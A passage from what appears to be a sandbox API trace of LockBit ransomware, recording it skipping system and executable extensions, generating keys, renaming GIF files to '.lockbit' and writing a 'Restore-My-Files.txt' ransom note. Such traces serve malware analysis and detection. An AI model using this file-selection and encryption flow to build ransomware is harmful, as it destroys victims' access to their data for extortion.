returned 1 [0205.023] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.023] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.023] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.024] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115863.GIF") returned 1 [0205.024] lstrcmpiW (lpString1="ntldr", lpString2="J0115863.GIF") returned 1 [0205.024] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115863.GIF") returned 1 [0205.024] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115863.GIF") returned -1 [0205.024] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115863.GIF") returned -1 [0205.024] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115863.GIF") returned 1 [0205.024] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115863.GIF") returned -1 [0205.024] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.024] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF") returned=".GIF" [0205.024] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.024] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.025] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.025] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.025] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF.lockbit") returned 78 [0205.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115863.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.030] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.030] malloc (_Size=0x40068) returned 0x3df0008 [0205.030] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=237) returned 1 [0205.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.031] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.032] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.032] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.036] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.036] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.036] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.036] free (_Block=0x1fa2ed8) [0205.036] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115863.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.036] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.036] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c9cf00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x57c9cf00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115864.GIF", cAlternateFileName="")) returned 1 [0205.037] lstrcmpiW (lpString1=".", lpString2="J0115864.GIF") returned -1 [0205.037] lstrcmpiW (lpString1="..", lpString2="J0115864.GIF") returned -1 [0205.037] PathFindExtensionW (pszPath="J0115864.GIF") returned=".GIF" [0205.037] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.037] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.037] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.038] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.038] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.038] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.038] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.038] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115864.GIF") returned 1 [0205.038] lstrcmpiW (lpString1="ntldr", lpString2="J0115864.GIF") returned 1 [0205.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115864.GIF") returned 1 [0205.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115864.GIF") returned -1 [0205.039] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115864.GIF") returned -1 [0205.039] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115864.GIF") returned 1 [0205.039] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115864.GIF") returned -1 [0205.039] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.039] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF") returned=".GIF" [0205.039] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.039] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.039] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.040] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.040] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.040] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.040] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.040] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.040] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF.lockbit") returned 78 [0205.040] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115864.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.041] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.041] malloc (_Size=0x40068) returned 0x3df0008 [0205.042] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0205.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.042] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.043] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.043] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.043] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.047] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.047] malloc (_Size=0xb2) returned 0x1fa2ed8 [0205.047] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0205.047] free (_Block=0x1fa2ed8) [0205.047] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115864.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0205.047] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0205.047] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.047] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c9cf00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd42e760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x57c9cf00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115865.GIF", cAlternateFileName="")) returned 1 [0205.047] lstrcmpiW (lpString1=".", lpString2="J0115865.GIF") returned -1 [0205.047] lstrcmpiW (lpString1="..", lpString2="J0115865.GIF") returned -1 [0205.047] PathFindExtensionW (pszPath="J0115865.GIF") returned=".GIF" [0205.047] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.047] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.047] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.047] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.047] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.048] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.048] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.049] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115865.GIF") returned 1 [0205.049] lstrcmpiW (lpString1="ntldr", lpString2="J0115865.GIF") returned 1 [0205.049] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115865.GIF") returned 1 [0205.049] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115865.GIF") returned -1 [0205.049] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115865.GIF") returned -1 [0205.049] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115865.GIF") returned 1 [0205.049] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115865.GIF") returned -1 [0205.049] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0205.049] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF") returned=".GIF" [0205.049] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.049] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.049] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.049] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.049] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.050] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.050] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.050] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF.lockbit") returned 78 [0205.050] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF" (normalized: 